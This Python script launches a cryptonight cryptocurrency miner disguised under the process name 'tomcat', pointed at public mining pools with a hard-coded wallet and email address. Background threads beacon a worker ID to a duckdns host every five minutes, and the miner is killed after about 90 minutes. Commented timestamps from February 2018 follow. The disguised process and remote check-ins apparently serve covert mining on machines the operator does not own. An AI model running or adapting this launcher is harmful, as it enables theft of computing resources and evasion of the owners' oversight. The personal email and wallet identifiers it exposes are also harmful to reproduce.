import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:41:06.573769
#2018-02-17 17:29:01.963691
#2018-02-17 19:18:01.965997
#2018-02-17 21:08:01.656022
#2018-02-17 22:51:06.361478
#2018-02-18 00:36:04.503730
#2018-02-18 02:26:04.546982
#2018-02-18 04:13:05.378230
#2018-02-18 06:03:05.383980
#2018-02-18 07:52:07.736278
#2018-02-18 09:41:05.259665
#2018-02-18 11:28:04.916668
#2018-02-18 13:14:04.819383
#2018-02-18 15:04:02.036512
#2018-02-18 16:52:01.492671
#2018-02-18 18:41:06.882618
#2018-02-18 20:28:07.051075
#2018-02-18 22:14:04.919834
#2018-02-19 00:02:01.723709
#2018-02-19 01:47:06.082441
#2018-02-19 03:32:05.116044
#2018-02-19 05:17:03.534495
#2018-02-19 07:05:06.144104
#2018-02-19 08:53:07.537048
#2018-02-19 10:42:04.635513
#2018-02-19 12:29:05.347898
#2018-02-19 14:17:07.137251
#2018-02-19 16:06:09.698265
#2018-02-19 17:55:01.325110
#2018-02-19 19:41:05.726475
#2018-02-19 21:30:03.036129
#2018-02-19 23:15:10.773736
#2018-02-20 01:03:05.220372
#2018-02-20 02:51:05.127693
#2018-02-20 04:38:04.491543
#2018-02-20 06:22:05.756540
#2018-02-20 08:06:08.033248
#2018-02-20 09:52:07.601069
#2018-02-20 11:36:01.747138
#2018-02-20 13:23:01.937037
#2018-02-20 15:07:01.470807
#2018-02-20 16:51:07.474224
#2018-02-20 18:41:01.988128
#2018-02-20 20:33:04.011548
#2018-02-20 22:17:08.162943
#2018-02-20 23:59:03.483432
#2018-02-21 01:43:07.300012
#2018-02-21 03:31:06.095144
#2018-02-21 05:19:05.583447
#2018-02-21 07:08:03.547642
#2018-02-21 08:54:05.933996
#2018-02-21 10:41:06.417713
#2018-02-21 12:28:05.006573
#2018-02-21 14:14:02.146179
#2018-02-21 15:59:08.898366
#2018-02-21 17:51:09.509471
#2018-02-21 19:38:03.820641
#2018-02-21 21:25:06.717857
#2018-02-21 23:12:01.587292
#2018-02-22 01:03:08.068855
#2018-02-22 02:52:01.368003
#2018-02-22 04:38:05.261050
#2018-02-22 06:22:07.856113
#2018-02-22 08:09:03.784369
#2018-02-22 09:56:08.230915
#2018-02-22 11:41:07.015106
#2018-02-22 13:28:07.170863
#2018-02-22 15:17:07.575962
#2018-02-22 17:03:02.184642
#2018-02-22 18:49:01.612991
#2018-02-22 20:40:07.732365
#2018-02-22 22:27:06.221640
#2018-02-23 00:12:05.180348
#2018-02-23 02:01:09.050928
#2018-02-23 03:49:06.328717
#2018-02-23 05:41:01.516975
#2018-02-23 07:26:05.583832
#2018-02-23 09:31:01.950053
#2018-02-23 11:38:04.888670
#2018-02-23 13:26:08.030682
#2018-02-23 15:11:02.185277
#2018-02-23 16:59:08.337820
#2018-02-23 18:45:07.714387
#2018-02-23 20:32:07.148829
#2018-02-23 22:19:07.629149
#2018-02-24 00:06:01.952921
#2018-02-24 01:56:03.998417
#2018-02-24 03:48:07.695064
#2018-02-24 05:34:05.167329
#2018-02-24 07:20:07.260383
#2018-02-24 09:10:08.298446
#2018-02-24 11:03:07.552479
#2018-02-24 12:52:06.901339
#2018-02-24 14:40:08.170741
#2018-02-24 16:31:06.680209
#2018-02-24 18:21:05.649840
#2018-02-24 20:07:07.649973
#2018-02-24 21:53:01.728356
#2018-02-25 01:58:07.304014
#2018-02-25 05:50:06.234193
#2018-02-25 11:37:07.658281